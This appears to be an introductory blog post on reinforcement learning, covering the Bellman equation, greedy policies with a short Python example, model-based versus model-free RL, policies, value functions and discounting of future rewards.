In this case, the **Bellman equation** is defined as:

$$ Q_\pi(s, a) = \sum_{s', r} P(s', r | s, a) \left(r + \gamma \sum_{a'} \pi(a' | s') Q_\pi(s', a')\right) $$

And the action-value function can also be used to generate a greedy policy:

$$ \pi(s) = \arg \max_{a} Q(s, a) $$
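For a tabular \(Q\), the greedy policy is a plain argmax lookup. The Q-values below are made-up numbers for illustration:

```python
Q = {
    ("s0", "a0"): 4.5, ("s0", "a1"): 1.0,
    ("s1", "a0"): 5.0, ("s1", "a1"): 0.9,
}
actions = ["a0", "a1"]

def greedy_policy(s):
    """pi(s) = argmax_a Q(s, a)."""
    return max(actions, key=lambda a: Q[(s, a)])

print(greedy_policy("s0"))  # a0
```

Note that, unlike the greedy policy derived from \(V(s)\), this lookup needs no transition model \(P\), which is one reason action-value methods are popular in the model-free setting.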

In theory, every problem solved using this framework can be interpreted as a simple planning problem, aiming to find an optimal solution to the Bellman equation and thus an optimal policy. In practice, however, the number of possible states and actions, as well as the limited knowledge of the environment, makes this approach infeasible, forcing us to find another way of computing the optimal policy. Therefore, algorithms tend to optimize the state-value function, the action-value function, or the policy directly. If the policy is optimized directly, we can describe it using a parameterized analytical function and solve the problem by optimizing that set of parameters. This is what we describe in the following blog posts.

Since we have defined the most important terms, let us go more deeply into specific algorithms and approaches in the following posts.

Looking at recent breakthroughs in Artificial Intelligence (AI), and especially in RL, we observe rapid progress in Machine Learning (ML) without human supervision in a wide variety of domains such as speech recognition, image classification, genomics, and drug discovery. Such models are mainly motivated by the fact that for some problems human knowledge is too expensive, too unreliable, or simply unavailable. Moreover, the ambition of AI research is to bypass the need for human supervision by creating models that achieve superhuman performance without human input.

One popular example is AlphaGo, a computer program developed by researchers at Google DeepMind, which by 2017 had surpassed the abilities of the best professional human Go players. Soon after, the model was beaten 100-0 by a newer evolution of itself trained without human supervision. Similar breakthroughs are found in the realm of e-sports: in 2019, a team at OpenAI developed bots able to beat human professionals at the highly competitive video game Dota 2 in a 5v5 match. So how can one not be curious about the magic behind RL? In the following, we will take you with us on a journey deep into the field of RL.

To understand the fundamentals of Reinforcement Learning it is important to understand one simple key concept: the relationship between an agent and its environment. To grasp the idea of an agent, it seems pretty natural to put oneself in its place: a human being interacting with its surroundings, retrieving information about itself and those surroundings, and changing its state through actions over a finite time horizon. This human being, representing the agent, usually has quite a wide variety of different actions to choose from. For example, imagine you take a walk with the dog: there are two options regarding clothing. We could either take a jacket or pass on doing so. To decide between the two options, it is pretty intuitive to observe the temperature outside, the environment so to speak. But how do we know if our decision was optimal? We will receive feedback, a reward, from the environment. In our example, we might be freezing if we decided not to take the jacket and the weather is quite cold, or sweating if it is too hot. And that example, at its core, represents what the relationship between agent and environment is about. More formally, the agent takes an action *a* in the current state *s* and collects a reward *r* in return to evaluate that choice. Finally, the system transitions into the next state *s'*, which is determined by a transition function *P*.

After introducing the key concept of the "agent - environment" relationship, we can introduce the two most basic cases regarding the agent's knowledge about the model describing its environment: Simply, knowing the model and not knowing the model.

Imagine a world, in which the weather is sunny exactly every other day and rainy on every remaining day. If our agent has to do some work outside, but can freely decide on which day he works on the respective tasks, knowing the world's model will probably cause the agent to work outside mostly on sunny days for a better outcome. On the other hand, if the model is not known to the agent he will probably finish his work on the first day to collect the reward, thus completing the task as soon as possible and learning the environment model as part of the learning experience itself.

In formal terms, we distinguish between model-based and model-free RL: in model-based RL, the model is known to the agent (or learned explicitly). This is why model-based problems can often be solved using "simpler" algorithms such as Dynamic Programming (DP). In comparison, model-free RL forces the agent to learn good behavior directly from interaction, without an explicit model of the environment.

A policy \(\pi\) describes the strategy by which the agent chooses which action to take in which state. The optimal policy returns the best possible action for each state to receive the biggest possible reward. Furthermore, we differentiate between a deterministic policy \(\pi(s)\) and a stochastic policy \(\pi(a | s)\).

Given state \(s\), it doesn't seem too practicable to brute-force every possible action; instead, we need a way to measure how good the available actions are. Consider the following example:

**State**: Having an amount of money in your bank account.

**Action 1**: Withdraw the money now to buy yourself something.

**Action 2**: Leave the money in your bank account to earn more money through interest and buy yourself something more expensive in the future.

Both of these actions result in a certain reward. The key difference is that if you only consider the rewards up to the current time, action 1 has a much higher reward because you would buy yourself something right away while action 2 would reward you with nothing. But, action 2 will grant you a much higher reward in the future and this reward may outweigh the reward of action 1. The main point to look at when deciding between actions 1 and 2 is, whether waiting the additional time is worth the higher reward or not. And this is the major idea behind value functions.

Value functions are mostly referred to as \(V(s_t)\), with \(s_t\) being the state at timestep \(t\).

As a result, the value function is computed from the future reward, also known as the **return**, which is the total sum of discounted rewards going forward. The discount factor, denoted by \(\gamma\), is used to discount future rewards so that we neither wait indefinitely nor ignore rewards we receive in the near future. Back to our example: if we didn't have such a discount factor, we might wait endlessly to buy a house, because its reward would outweigh the rewards of all daily expenses like buying food.
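A quick arithmetic sketch of this trade-off, with made-up reward amounts and an assumed discount factor of 0.95:

```python
gamma = 0.95

def discounted(reward, steps):
    """Value today of a reward received `steps` timesteps in the future."""
    return gamma ** steps * reward

spend_now = discounted(10.0, 0)   # buy something today
save_10 = discounted(15.0, 10)    # a bigger purchase after 10 steps
save_100 = discounted(30.0, 100)  # an even bigger purchase, far in the future

print(round(spend_now, 2), round(save_10, 2), round(save_100, 2))
# -> 10.0 8.98 0.18
```

Even though the far-future reward is the largest in absolute terms, discounting shrinks it to near zero, so the agent never ends up "waiting forever for the house".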

Now we can use these value functions to update our policies converging to the optimal policy. We will encounter this principle as value iteration in a later post.
